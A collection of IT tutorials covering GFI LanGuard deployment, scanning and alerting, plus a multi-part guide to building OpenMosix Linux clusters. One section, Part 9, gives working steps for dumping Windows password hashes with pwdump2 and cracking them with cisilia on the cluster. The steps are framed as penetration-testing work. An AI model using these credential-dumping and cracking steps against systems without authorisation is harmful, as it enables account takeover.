Final configuration options for remote deployment of Mozilla Firefox via GFI LanGuard

Figure 4. Final configuration options for remote deployment of Mozilla Firefox via GFI LanGuard

GFI LanGuard’s remote software deployment is so sophisticated that it even allows the configuration of the number of threads that will be executed on the remote computer (under the Advanced options link), helping ensure minimum impact for the user working on the remote system.

Once complete, click on OK to proceed with the remote deployment. LanGuard will then return back to the Remediation window and provide real-time update of the installation process, along with a detailed log below:

GFI LanGuard Remote software deployment of Mozilla Firefox complete

Figure 5. GFI LanGuard Remote software deployment of Mozilla Firefox complete

Installation of Mozilla Firefox was incredibly fast and to our surprise, the impact on the remote host was undetectable. We actually didn’t realise the installation was taking place until the Firefox icon appeared on the desktop. CPU history also confirm there was no additional load on the server:

Successful installation of Mozilla Firefox, without any system performance impact!

Figure 6. Successful installation of Mozilla Firefox, without any system performance impact!

GFI LanGuard’s software deployment feature is truly impressive. It not only provides network administrators with the ability to deploy software on any machine on their network, but also gives complete control on the way the software will be deployed and resources that will be used on the remote computer during the installation. Additional options such as scheduling the deployment, custom user messages before or after the installation, remote reboot and many more, make GFI LanGuard it a necessary tool for any organization.

  • Hits: 11002

How to Manually Deploy – Install GFI LanGuard Agent When Access is Denied By Remote Host (Server – Workstation)

When IT Administrators and Managers are faced with the continuous failure of GFI LanGuard Agent deployment e.g (Access is denied), it is best to switch to manual installation in order to save valuable time and resources. The reason of failure can be due to incorrect credentials, disabled account, firewall settings, disabled remote access on the target computer and many more. Deploying GFI LanGuard Agents is the best way to scan your network for unpatched machines or machines with critical vulnerabilities.

GFI LanGuard Agent deployment failing with Access is denied

Figure 1. GFI LanGuard Agent deployment failing with Access is denied

Users interested can also check our article Benefits of Deploying GFI LanGuard Agents on Workstations & Servers. Automate Network-wide Agent Scanning and Deployment.

Step 1 – Locate Agent Package On GFI LanGuard Server

The GFI LanGuard Agent installation file is located in one of the following directories, depending on your operating system:

  • For 32bit operating systems: c:\Program Files\GFI\LanGuard 11\Agent\
  • For 64bit operating systems: c:\Program Files (x86)\GFI\LanGuard 11\Agent\

The location of GFI LanGuard Agent on our 64bit O/S.

Figure 2. The location of GFI LanGuard Agent on our 64bit O/S.

Step 2 – Copy The File To The Target Machine & Install

Once the file is copied to the target machine, execute it using the following single line command prompt:

c:\LanGuard11agent.msi /qn GFIINSTALLID="InstallationID" /norestart /L*v "%temp%\LANSS_v11_AgentKitLog.csv

Note: InstallationID is an ID that can be found in the crmiini.xml file located on the GFI LanGuard server directory for 32bit O/S: c:\Program Files\GFI\LanGuard 11 Agent  or c:\Program Files (x86)\GFI\LanGuard 11 Agent for 64bit O/S.

Following is a screenshot of the contents of our crmiini.xml file where the installation ID is clearly shown:

Installation ID in crmiini.xml file on our GFI LanGuard Server

Figure 3. Installation ID in crmiini.xml file on our GFI LanGuard Server

With this information, the final command line (DOS) for the installation of the Agent will be as follows:

LanGuard11agent.msi /qn GFIINSTALLID=" e86cb1c1-e555-40ed-a6d8-01564bdb969e" /norestart /L*v "%temp%\LANSS_v11_AgentKitLog.csv

Note: Make sure the command prompt is run with Administrator Privileges (Run as Administrator), to ensure you do not have any problems with the installation.

Here is a screenshot of the whole command executed:

Successfully Installing GFI LanGuard Agent On Workstations & Servers

Figure 4. Successfully Installing GFI LanGuard Agent On Workstations & Servers

Notice that the installation is a ‘silent install’ and will not present any message or prompt the user for a reboot. This makes it ideal for quick deployments where no reboot and minimum user interruption is required.

A restart will be necessary to complete the Agent initialization.

Important Notes

After completing the manual installation of the GFI LanGuard Agent, it is necessary to remote deploy the Agent from the GFI LanGuard console as well, otherwise the GFI LanGuard server will not be aware of the Agent manually installed on the remote host.

Also, it is necessary to deploy at least one Agent remotely via GFI LanGuard server console, before attempting the manual deployment, in order to initially populate the Crmiini.xml file with the installation id parameters.

This article covered the manual deployment of GFI’s LanGuard Agent on Windows-based machines. We took a look at common reasons why remote deployment of the Agent might fail, and covered step-by-step the manual installation process and prerequisites to ensure the Agent is able to connect to the GFI LanGuard server.

  • Hits: 19332

Benefits of Deploying GFI LanGuard Agents on Workstations & Servers. Automate Network-wide Agent Scanning & Deployment

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-1aGFI LanGuard Agents are designed to be deployed on local (network) or remote servers and workstations. Once installed, the GFI LanGuard Agents can then be configured via LanGuard’s main server console, giving the administrator full control as to when the Agents will scan the host they are installed on, and communicate their status to the GFI LanGuard server.

Those concerned about system resources will be pleased to know that the GFI LanGuard Agent does not consume any CPU cycles or resources while idle. During the time of scanning, once a day for a few minutes, the scan process is kept at a low priority to ensure that it does not interfere or impact the host’s performance.

GFI LanGuard Agents communicate with the GFI LanGuard server using TCP port 1070, however this can be configured.

Let’s see how we can install the GFI LanGuard Agent from the server’s console.

First open GFI LanGuard and select Agents Management from the Configuration tab:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-1

Figure 1. Select Agents Management and the Deploy Agents

Next, you can choose between Local domain or Custom to define your target(s):

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-2

Figure 2. Defining Target rules for GFI LanGuard Agent deployment

Since we’ve selected Custom, we need to click on Add new rule to add our targets.

The targets can be defined via their Computer name (shown below), Domain name or Organization Unit:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-3

Figure 3. Defining our target hosts using their Computer name

When complete, click on OK to return to the previous window.

We now see all computer hosts selected:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-4

Figure 4. Viewing selected hosts for Agent deployment

The Advance Settings option on the lower left area of the window, allows us to configure the automatic discovery of machines with Agents installed, setup up the Audit schedule of the agent (when it will scan its host and update the LanGuard server), Scan profile used by the Agent, plus an extremely handy feature called Auto Remediation which enables GFI LanGuard to automatically download and install missing updates, service packs, uninstall unauthorized applications and more, on the remote computers.

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-5

Figure 5. GFI LanGuard - Agent Advanced Settings – Audit Schedule tab

The screenshot below shows us the Auto Remediation tab settings:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-6

Figure 6. Agent Advanced Settings – Auto Remediation tab

When done, click on OK to save the selected settings and return back to the previous window.

Now click on Next to move to the next step. At this point, we need to enter the administrator credentials of the remote machine(s) so that GFI LanGuard can log into the remote machines and deploy the agent. Enter the username and password and hit Next and then Finish at the last window:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-7

Figure 7. Entering the necessary credentials for the Agent deployment

GFI LanGuard will now being the deployment of its Agent to the selected remote hosts:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-8

Figure 8. GFI LanGuard preparing for the Agent deployment

After a while, the LanGuard Agent will report its installation status. Where successfully, we will see the Installed message, otherwise a Pending install message will continue to be displayed along with an error if it was unsuccessful:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-9

Figure 9. LanGuard Agent installation status

Common problems not allowing the successful Agent deployment are incorrect credentials, Firewall or user rights.

To check the status of the installed Agent, we can simply select the desired host, right-click and select Agent Diagnostic as shown below:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-10

Figure 10. Accessing GFI LanGuard Agent Diagnostics

The Agent Diagnostic window is an extremely helpful feature as it provides a great amount of information on the Agent and the remote host. In addition, at the end of the Diagnosis Activity Window, we’ll find a zip file that contains all the presented information. This file can use email to GFI’s support in case of Agent problems:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-11

Figure 11. Running the Agent Diagnostics report

The GFI LanGuard Agent is an extremely useful feature that allows the automatic monitoring, patching and updating of the host machine, leaving IT Administrators and Managers to deal with other important tasks. Thanks to its Domain & Workgroup support, GFI LanGuard it can handle any type and size of environment. If you haven’t used it yet, download your copy of GFI LanGuard and give it a try – you’ll be surprised how much valuable information you’ll get on your systems security & patching status and the time you’ll save!

  • Hits: 13338

How to Configure Email Alerts in GFI LanGuard 2015 – Automating Alerts in GFI LanGuard

One of the most important features in any network security monitoring and patch management application such as GFI’s LanGuard is the ability to automate tasks e.g automatic network scanning, email alerts etc. This allows IT Administrators, Network Engineers, IT Managers and other IT Department members, continue working on other important matters while they have their peace of mind that the security application is keeping things under control and will alert them instantly upon any changes detected within the network or even vulnerability status of the hosts monitored.

GFI LanGuard’s email alerting feature can be easily accessed either from the main Dashboard where usually the Alerting Options notification warning appears at the bottom of the screen:

gfi-languard-configure-automated-email-alert-option-1

Figure 1. GFI LanGuard email alerting Option Notification

Or alternatively, by selecting Configuration from the main menu and then Alerting Options from the left side area below:

gfi-languard-configure-automated-email-alert-option-2

Figure 2. Accessing Alerting Options via the menu

Once in the Alerting Options section, simply click on the click here link to open the Alerting Options Properties window. Here, we enter the details of the email account that will be used, recipients and smtp server details:

gfi-languard-configure-automated-email-alert-option-3

Figure 3. Entering email, recipient & smtp account details

Once the information has been correctly provided, we can click on the Verify Settings button and the system will send the recipients a test notification email. In case of an IT department, a group email address can be configured to ensure all members of the department receive alerts and notifications.

Finally, at the Notification tab we can enable and configure a daily report that will be sent at a specific time of the day and also select the report format. GFI LanGuard supports multiple formats such as PDF, HTML, MHT, RTF, XLS, XLSX & PNG.

gfi-languard-configure-automated-email-alert-option-4

Figure 4. GFI LanGuard Notification Window settings

When done, simply click on the OK button to return back to the Alerting Options window.

GFI LanGuard will now send an automated email alert on a daily basis whenever there are changes identified after a scan.

This article showed how GFI LanGuard, a network security scanner, vulnerability scanner and patch management application, can be configured to automatically send email alerts and reports on network changes after every scan.

  • Hits: 9773

How to Scan Your Network and Discover Unpatched, Vulnerable, High-Risk Servers or Workstations using GFI LanGuard 2015

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-1aThis article shows how any IT Administrator, network engineer or security auditor can quickly scan a network using GFI’s LanGuard and identify the different systems such as Windows, Linux, Android etc. More importantly, we’ll show how to uncover vulnerable, unpatched or high-risk Windows systems including Windows Server 2003, Windows Server 2008, Windows Server 2012 R2, Domain Controllers, Linux Servers such as RedHat Enterprise, CentOS, Ubuntu, Debian, openSuse, Fedora, any type of Windows workstation (XP, Vista, 7, 8, 8.1,10) and Apple OS X.

GFI’s LanGuard is a swiss-army knife that combines a network security tool, vulnerability scanner and patching management system all in one package. Using the network scanning functionality, LanGuard will automatically scan the whole network and use the provided credentials to log into every located host and discover additional vulnerabilities.

To begin, we launch GFI LanGuard and at the startup screen, select the Scan Tab as shown below:

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-1

Figure 1. Launching GFI LanGuard 2015

Next, in the Scan Target section, select Custom target properties (box with dots) and click on Add new rule. This will bring us to the final window where we can add any IP address range or CIDR subnet:

 

Figure 2. Adding your IP Network – Subnet to LanGuard for scanning

Now enter the IP address range you would like LanGuard to scan, e.g 192.168.5.1 to 192.168.5.254 and click OK.

The new IP address range should now appear in the Custom target properties window:

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-3

Figure 3. Custom target properties displays selected IP address range

Now click on OK to close the Custom target properties window and return back to the Scan area:

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-4

Figure 4. Returning back to LanGuard’s Scan area

At this point, we can enter the credentials (Username/Password) to be used for remotely accessing hosts discovered (e.g domain administrator credentials is a great idea) and selectively click on Scan Options to reveal additional useful options to be used during our scan, such as Credential Settings and Power saving options. Click on OK when done:

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-5

Figure 5. Additional Scan Options in GFI’s LanGuard 2015

We can now hit Scan to begin the host discovery and scan process:

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-6

Figure 6. Initiating the discovery process in GFI LanGuard 2015

GFI LanGuard will being scanning the selected IP subnet and list all hosts found in the Scan Results Overview window area. As shown in the above screenshot, each host will be identified according to its operating system and will be accessed for open ports, vulnerabilities and missing operating system & application patches.

The full scan profile selected will force GFI LanGuard to run a complete detailed scan of every host.

Once complete, GFI LanGuard 2015 displays a full report summary for every host and an overal summary for the network:

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-7

Figure 7. GFI LanGuard 2015 overall scan summary and results

Users can select each host individually from the left window and their Scan Results will be diplayed on the right window area (Scan Results Details). This method allows quick navigation through each host, but also allows the administrator or network security auditor to quickly locate specific scan results they are after.

This article explained how to configure GFI LanGuard 2015 to scan an IP subnet network, identify host operating systems, log into remote systems, scan for vulnerabilities, missing operating system and application patches, open ports and other critical security issues. IT Managers, network engineers and security auditors should defiantely try GFI LanGuard and see how easy & automated their job can become with such a powerfull network security tool in their hands.

  • Hits: 12553

OpenMosix - Part 9: Interesting Ideals: Distributed Password Cracking & Encoding MP3s

Now that you hopefully have a nice powerful cluster running, there are hundreds of different ways you can use it. The most obvious use is any activity that takes a long time and uses a large amount of CPU processing power and/or RAM. We're going to show you a couple of projects that have benefited us in the real world.

Bear in mind that there are some applications that migrate very nicely over an openMosix cluster, for example 'make' when you're compiling can speed up your compile times significantly. If you do a little research on the net, you'll find examples of applications that will migrate well and which won't yield much speed increase. If you are a developer looking to take advantage of openMosix, applications that fork() child processes will migrate wonderfully, whereas multithreaded applications at present, do not seem to migrate threads.

Anyway, here are a couple of cool uses for your cluster:

Distributed Password Cracking

If your role is in security role or if you work as a penetration tester, you'll probably encounter the need to crack passwords at some point or other. We regularly use l0phtcrack for Windows passwords, but were interested by the opportunity to use our nice new 10 system cluster to significantly speed things up. After briefly hunting around the net, we discovered 'Cisilia', which is a Linux based Windows LM / NTLM password cracker designed specifically to take advantage of openMosix style clustering!

You can get a copy of cisilia by visiting the following site and clicking on the R&D Projects menu on the left: http://www.citefa.gov.ar/SitioSI6_EN/si6.htm

There you'll find two files, 'cisilia' which is the actual command line based password cracking engine and 'xisilia' which is an X based GUI for the same. We didn't install the X based GUI, since we were working with our cluster completely over SSH.

Once you download the RPMs, you can install them by typing:

rpm -ivh *isilia*.rpm

If you installed from the tarball sources like we did, it is just as simple:

1) Unzip the tarball

tar xvzf cisilia*.tar.gz

2) Enter the directory and configure the compilation process for your system:

./configure

3) Finally, start the compilation process:

make

Now you need to get a Windows password file to crack. For this you'll want to use pwdump to grab the encrypted password hashes. This is available at the following link:

https://packetstormsecurity.com/files/13790/pwdump2.zip.html

Unzip it and run it on the Windows box which has the passwords you want to crack. You will want to save the results to a file, so do the following:

pwdump2 > passwdfile

Now copy the file 'passwdfile' across to a node in your cluster. Fire up cisilia using the following command:

cisilia -l crack_file -n 20 <path to the passwdfile you copied>

•  -l   tells cisilia to save the results to a file called crack_file

•  -n  tells cisilia how many processes it should spawn. We started 20, since we wanted 2 processes to go to each node in the cluster.

We were pleasantly surprised by how quickly it started running through 6-7 character alphanumeric passwords. Enjoy !

Encoding MP3s

Do you get annoyed by how long it takes to convert a CD to MP3? Or to convert any kind of media file?

This is one of the places where a cluster excels. When you convert your rips to MP3, you only process one WAV file at a time, how about you run it on your cluster and let it simultaneously encode all your MP3s?

Someone has already taken this to the absolute extreme, check out http://www.rimboy.com/cluster/ for what he's got setup.

To quickly rip a CD and convert it to digital audio, you will need 2 programs:

A digital audio extractor, and an audio encoder.

For the digital audio extractor we recommend Cdparanoia. For the audio encoder, we're going to do things a bit differently:

In the spirit of the free open source movement, we suggest you check out the OGG Vorbis encoder. This is a free, open audio compression standard that will compress your WAV files much better than MP3, and still have a higher quality!

They also play perfectly in Winamp and other media players. Sounds too good to be true? Check out their website at the link below. Of course if you still aren't convinced that OGG is better than MP3, you can replace the OGG encoder with any MP3 encoder for this tutorial.

Get and install both the cdparanoia ripper and the oggenc encoder from the following URLs:

CDparanoia - http://www.xiph.org/paranoia/

OGG Vorbis Encoder - https://xiph.org/vorbis/

Now we just need to rip and encode on our cluster. Put the CD you want to convert in the drive on one node, and just run the following:

cdparanoia -B

for i in `ls *.wav`;

do oggenc $i &

done;

This encodes your WAV files to OGG format at the default quality level of 3, which produces an OGG file of a smaller size and significantly better sound quality than an MP3 at 128kbps. You can experiment with the OGG encoder options to figure out the best audio quality for your requirements.

This just about completes the openmosix tutorial we've prepaired for you.

We surely hope it has been an enlighting tutorial and will help most of you make some good use of those old 'mini super computers' you never knew you had :)

Back to the Linux/Unix Section or OpenMosix Section.

  • Hits: 16392

OpenMosix - Part 8: Using SSH Keys Instead Of Passwords

One of the things that you'll notice with openMosixview is that if you want to change the speed sliders of a remote node, you will have some trouble. This is because openMosixview uses SSH to remotely set the speed on the node. What you need to do is set up passwordless SSH authentication using public/private keys.

This is just a quick walk-through on how to do that, for a much more detailed explanation on public/private key SSH authentication, see our tutorial in the GNU/Linux Section.

First, generate your SSH public/private key-pair:

ssh-keygen -t dsa

Second, copy the public key into the authorized keys file. Since your home directory is shared between nodes, you only need to do this on one node:

cat ~/.ssh/*.pub >>~/.ssh/authorized_keys

However, for root, you will have to do this manually for each node (replace Node# with each node individually):

cat ~/.ssh/*.pub >>/mfs/Node#/root/.ssh/authorized_keys

After this, you have to start SSH-agent, to cache your password so you only need to type it once. Add the following to your .bash_profile or .profile:

ssh-agent $SHELL

Now each time after you login, just type ‘ ssh-add' and supply your password once. By following this you will be able to login passwordless to any of the nodes, and the sliders in openMosixview should work perfectly for you. Next: Interesting Ideals: Distributed Password Cracking & Encoding MP3s

  • Hits: 15385

OpenMosix - Part 7: The openMosix File System

You've probably been wondering how openMosix handles things like file read/writes when a process migrates to another node.

For example, if we run a process that needs to read some data from a file /etc/test.conf on our local machine, if this process migrates to another node, how will openMosix read that file ? The answer is in the openMosix File System, or OMFS.

OMFS does several things. Firstly, it shares your disk between all the nodes in the cluster, allowing them to read and write to the relevant files. It also uses what is known as Direct File System Access (DFSA), which allows a migrated process to run many system calls locally, rather than wasting time executing them on the home node. It works somewhat like NFS, but has features that are required for clustering.

If you installed openMosix from the RPMs, the omfs should already be created and automatically mounted. Have a look in /mfs, and you will see a subdirectory for every node in the cluster, named after the node ID. These directories will contain the shared disks of that particular node.

You will also see some symlinks like the following:

here -> maps to the current node where your process runs

home -> maps to your home node

If the /mfs directory has not been created, you can mount it manually with the following:

mkdir /mfs

mount /mfs /mfs -t mfs

If you want it to be automatically mounted at boot time, you can create the following entry in your /etc/fstab

mfs_mnt /mfs mfs dfsa=1 0 0

Bear in mind that this entry has to be on all the nodes in the cluster. Lastly, you can turn the openMosix file system off using the command:

mosctl nomfs

Now that we've got that all covered, it's time to take a look on how you can make the ssh login process less time consuming, allowing you to take control of all your cluster nodes any time you require, but also help the cluster system execute special functions. Next topic covers using SSH keys with openMosix instead of passwords.

  • Hits: 15387

OpenMosix - Part 6: Controlling Your OpenMosix Cluster

The openMosix team have provided a number of ways of controlling your cluster, both from the command line, as well as through GUI based tools in X.

From the command line, the main monitoring and control tools are:

  • mosmon – which shows you the load on each of the nodes, their speed, memory usage, etc. Pressing 'h' will bring up the help with the different options;
  • mosctl - which is a very powerful command that allows you to control how your system behaves in the cluster, some of the interesting options are:
    • mosctl block – this stops other people's processes being run on your system (a bit selfish don't you think ;))
    • mosctl -block – the opposite of the above
    • mosctl lstay – this stops your local processes migrating to other nodes for processing
    • mosctl nolstay – the opposite of the above
    • mosctl setspeed <number> - which sets the max processing speed to contribute. 10000 is a benchmark of a Pentium 3 1Ghz.
    • mosctl whois <node number> - this tells you the IP address of a particular node
    • mosctl expel – this expels any current remote processes and blocks new ones from coming in
    • mosctl bring – this brings back any of your own local processes that have migrated to other nodes
    • mosctl status <node number> - which shows you whether the node is up and whether it is 'blocking' processes, 'staying' them, etc.
    • mosrun - allows you to run a process controlling which nodes it should run on
    • mps - this is just like 'ps' to show you the process listing, but it also shows which node a process is running on
    • migrate - this command allows you to manually migrate a process to any node you like, the syntax for using it is 'migrate <pid> <node #>'. You can also use 'migrate <pid> balance' to load balance a process automatically.
    • dsh - Distributed Shell. This allows you to run a command on all the nodes simultaneously. For example ‘ dsh -a reboot ' will reboot all the nodes.

From the GUI, you can just start 'openmosixview'. This allows you to view and manage all the nodes in your cluster. It also shows you the load balancing efficiency of the cluster in near-real-time. You can also see what is the total speed and RAM that your cluster is providing you:

linux-openmosix-controlling-cluster-1

We should note that all cluster nodes that are online are represented with the green colour, while all offline cluster with the red colour.

One of the neatest things about 'openmosixview' is the GUI for controlling process migration.

linux-openmosix-controlling-cluster-2

It depicts your current node at the center, and other nodes in the cluster around it. The ring around your node represents the processes running on your local box. If you hover over any of them you can see the process name and PID. Whenever one of your processes migrates to another node, you will see it detach and appear on a new node with a line linking it to your system!

You can also manually control the migration. You can drag and drop your processes onto other nodes, even selecting multiple processes and then dragging them to another node is easy. If you double click on a process running on a remote node, it will come back home and execute locally.

You can also open the openMosix process monitor which shows you which process is running on which node.

There is also a history analyzer to show you the load over a period of time. This allows you to see how your cluster was being used at any given point in time:

linux-openmosix-controlling-cluster-3

As you can see, the GUI tools are very powerful, they provide you with a large amount of the functionality that the command line tools do. If, however, you want to make your own scripts, the command line tools are much more versatile. Managing a cluster can be a lot of fun, modify the options and play around with the GUI to tweak and optimize your raw processing power!! Our next article covers The openMosix File System.

  • Hits: 15826

OpenMosix - Part 5: Testing Your Cluster

Now let's actually make this cluster do some work! There is a quick tool you can use to monitor the load of your cluster.

Type 'mosmon' and press enter. You should see a screen similar to the screenshot below:

linux-openmosix-testing-cluster-1

 

Run mosmon in one VTY (press ctrl+alt+f1), then switch to another VTY (ctrl+alt+f2)

Let's run a simple awk command to run a nested loop and use up some processing power. If everything went well, we should see the load in mosmon jump up on one node, and then migrate to the other nodes.

The command you need to run is:

awk 'BEGIN {for(i=0;i<10000;i++)for(j=0;j<10000;j++);}'

If you choose to, you can start multiple awk processes by backgrounding them. Just append an ‘&' to the command line and run it a few times.

Go back to mosmon by pressing ctrl+alt+f1, you should see the load rising on your current node, and then slowly distributing to the other machines in the cluster like in the picture below:

linux-openmosix-testing-cluster-2

Congratulations! You are now taking advantage of multi system clustering!

If you want you can time the process running locally, turn off openmosix by entering the command:

/etc/init.d/openmosix stop

Then run the following script:

#!/bin/sh

date

awk 'BEGIN {for(i=0;i<10000;i++)for(j=0;j<10000;j++);}'

date

This will tell you how long it took to perform the task. You can modify the loop values to make it last longer. Now restart openmosix, using the command:

/etc/init.d/openmosix start

Re-run the script to see how long it takes to process. Remember that your network is a bottleneck for performance. If your process finishes really quickly, it won't have time to migrate to the other nodes over the network. This is where tweaking and optimizing your cluster becomes fun.

Next up we'll take a look on how you can control a OpenMosix cluster.

  • Hits: 14687

OpenMosix - Part 4: Starting Up Your OpenMosix Cluster

Okay, so now you've got a couple of machines with openMosix installed and booted, it's time to understand how to add systems to your cluster and make them work together.

OpenMosix has two ways of doing this:

1. Auto-discovery of Cluster Nodes

OpenMosix includes a daemon called 'omdiscd' which identifies other openMosix nodes on the network by using multicast packets (for more on multicasting, please see our multicast page). This means that you don't have to bother manually configuring the nodes. This is a simple way to get your cluster going as you just need to boot a machine and ensure it's on the network. When this stage is complete, it should then discover the existing cluster and add itself automatically!

Make sure you set up your network properly. As an example, if you are assigning an IP address of 192.168.1.10 to your first ethernet interface and your default gateway is 192.168.1.1 you would do something like this:

ifconfig eth0 192.168.1.1 netmask 255.255.255.0 broadcast 192.168.1.255 up (configure's your system's ethernet interface)

route add default gw 192.168.1.1 (adds the default gateway)

The auto-discovery daemon might have started automatically on bootup, check using:

ps aux | grep 'omdiscd'

The above command should reveal the 'omdiscd' process running on your system.

If it hasn't, you can manually start by typing 'omdiscd'. If you want to see the nodes getting added, you can choose to run omdiscd in the foreground by typing 'omdiscd -n'. This will help you troubleshoot the auto-discovery.

2. The /etc/openmosix.map File Configuration

If you don't want to use autodiscovery, you can manually manage your nodes using the openmosix.map file in the /etc directory. This file basically contains a list of the nodes on your cluster, and has to be the same across all the nodes in your cluster.

The syntax is very simple, it is a tab delimited list of the nodes in your cluster. There are 3 fields:

Node ID, IP Address and Number.

•  Node ID is the unique number for the node.

•  IP address is the IP address of the node.

•  Number specifies how many nodes in the range after the IP.

As an example, if you have nodes

192.168.1.10

192.168.1.11

192.168.1.12

192.168.1.50

your file would look like this:

1 192.168.1.10 2

2 192.168.1.50 1

We could have manually specified the IP's 192.168.1.11 and 192.168.1.12, but by using the 'number' field, openmosix counts up the last octet of the IP, and saves you the trouble of making individual entries.

Once you've done your configuration, you can control openMosix using the init.d script that should have been installed. If they were not, you can find it in the scripts directory of the userland tools you downloaded, make it executable and copy it to the init.d directory like this:

mv ./openmosix /etc/init.d

chmod 755 /etc/init.d/openmosix

You can now start, stop and restart openMosix with the following commands:

/etc/init.d/openmosix start

/etc/init.d/openmosix stop

/etc/init.d/openmosix restart

Next up we'll take a look on how you can test your new openMosix cluster!

  • Hits: 16350

OpenMosix - Part 3: Using ClusterKnoppix

So maybe none of those methods worked for you. Well, you'll be happy to know that you can get a cluster up and running within a few minutes using an incredible bootable Knoppix liveCD that is preconfigured for clustering. It's called ‘ClusterKnoppix' and a quick search on Google will reveal a number of sources from where you can download the ISO images.

The best thing about Cluster Knoppix, is that you can just boot a system with the CD and it will automatically add itself to the cluster. You don't even need to install the O/S to your hard disk. This makes it a very useful way to setup a cluster in a hurry using pre-existing systems.

Another really nice feature is that you don't need to burn 20 copies of the CD to make a 20 system cluster. Just boot one system with the CD, and then run the command

knoppix-terminalopenmosixserver

This will let you setup a clustering-enabled terminal-server. Now if you have any systems that can boot from their network card (PXE compliant booting), they will automatically download a kernel image and run Cluster Knoppix!

It's awesome to see this at work, especially since we were working with 2 systems that didn't have a CD-ROM drive or a hard-disk. They just became diskless clients and contributed their resources to the cause! Next page covers starting up your openMosix Cluster.

  • Hits: 19886

OpenMosix - Part 2: Building An openMosix Cluster

Okay, let's get down to the fun part! Although it may sound hard, setting up a cluster is not very difficult, we're going to show you the hard way (which will teach you more) as well as a very neat quick way to set up an instant cluster using a Knoppix Live CD. We suggest you try both out to understand the benefits of each approach.

We will require the following:

1. Two or more machines (we need to cluster something!), the configuration doesn't matter even if they are lower end. They will require network cards and need to be connected to each other over a network. Obviously, the more systems you have, the more powerful your cluster will be. Don't worry if you don't have many machines, we'll show you how to temporarily use resources from systems and schedule when they can contribute their processing power (this works very well in an office when you might want some systems to join the cluster only after office hours).

2. A Cluster Knoppix LiveCD for the second part of this tutorial. While this is not strictly necessary, we want to show you some of the advantages of using the LiveCD for clustering. It also makes setting up the cluster extremely easy. You can get a fully working cluster up in the amount of time it takes you to boot a system ! You can get Cluster Knoppix from the following link: https://distrowatch.com/table.php?distribution=clusterknoppix

Getting & Installing openMosix

OpenMosix consists of two parts, the first is the kernel patch which does the actual clustering and the second is the userland tools that allow you to monitor and control your cluster.

There are a variety of ways to install openMosix, we've chosen to show three of them:

1. Patching the kernel and installing from the source

2. Installing from RPM's

3. Installing in Debian

1. Installing from source

The latest version of openMosix at the time of this writing works with the kernel version 2.4.24. If you want to do this the proper way, get the plain kernel sources for 2.4.24 from https://www.kernel.org/ and the openMosix patch for the same version of the kernel from https://sourceforge.net/projects/openmosix/

At the time of writing this, the direct kernel source link is

http://www.kernel.org/pub/linux/kernel/v2.4/linux-2.4.24.tar.bz2

Once you've got the kernel sources, unpack them to your kernel source directory, in this case that should be:

/usr/src/linux-2.4.24

Now move the openMosix patch to the kernel source directory and apply it, like so:

mv /root/openMosix-2.4.24.gz /usr/src/linux-2.4.24

cd /usr/src/linux-2.4.24

zcat openMosix-2.4.24.gz | patch -Np1

NOTE: If you downloaded a bzip zipped file, you might need to use 'bzcat' rather than 'zcat' in the last line.

Now your kernel sources are patched with openMosix.

Now you have to configure your kernel sources, using one of the following commands:

make config

make menuconfig (uses an ncurses interface)

make xconfig (uses a TCL/TK GUI interface)

If you use X and have a recent distribution, 'make xconfig' is your best bet. Once you get the kernel configuration screens, enable the following openMosix options in the kernel configuration:

CONFIG_MOSIX=y

# CONFIG_MOSIX_TOPOLOGY is not set

CONFIG_MOSIX_UDB=y

# CONFIG_MOSIX_DEBUG is not set

# CONFIG_MOSIX_CHEAT_MIGSELF is not set

CONFIG_MOSIX_WEEEEEEEEE=y

CONFIG_MOSIX_DIAG=y

CONFIG_MOSIX_SECUREPORTS=y

CONFIG_MOSIX_DISCLOSURE=3

CONFIG_QKERNEL_EXT=y

CONFIG_MOSIX_DFSA=y

CONFIG_MOSIX_FS=y

CONFIG_MOSIX_PIPE_EXCEPTIONS=y

CONFIG_QOS_JID=y

Feel free to tweak your other kernel settings based on your hardware and requirements just as you would when installing a new kernel.

Finally, finish it all off by compiling the kernel with:

make dep bzImage modules modules_install

Now install your new kernel in your bootloader. For example, if you use LILO, edit your /etc/lilo.conf and create a new entry for your openMosix enhanced kernel. If you simply copy the entry for your regular kernel and change the kernel image to point to your new kernel, this should be enough. Don't forget to run 'lilo' when you finish editing the file.

After you have completed this, reboot, and if all went well, you should be able to select the openMosix kernel you just installed and boot with it. If something didn't work right, you can still select your regular kernel and boot normally to troubleshoot.

2. Installing from RPM

If you have an RPM based distribution, you can directly get a pre-compiled kernel image with openMosix enabled from the openMosix site (https://sourceforge.net/projects/openmosix/).

This is a fairly easy way to install openMosix as you just need to install 2 RPMs. This should work with Red Hat, SUSE etc. Get the two latest RPMs for the

a) openmosix-kernel

b) openmosix-tools

Now you can simply install both of these by using the command:

rpm -Uvh openmosix*.rpm

If you are using GRUB, the RPM's will even make the entry in your GRUB config so you can just reboot and select the new kernel. If you use LILO you will have to manually make the entry in /etc/lilo.conf. Simply copying the entry for your regular kernel and changing the kernel image to point to your new kernel should be enough. Don't forget to run 'lilo' when you finish editing the file.

That should be all you need to do for the RPM based installation. Just reboot and choose the openMosix kernel when you are given the choice.

3. Installing in Debian

You can install the RPM's in Debian as well as using Alien, but it is better to use apt-get to install the kernel sources and openmosix kernel patch. You can also use the 'apt-get' command to install openmosixview, which will give you a GUI to manage the cluster.

This is the basic procedure needed to follow for installing openMosix under Debian.

First, get the packages:

cd /usr/src

apt-get install kernel-source-2.4.24 kernel-package \

openmosix kernel-patch-openmosix

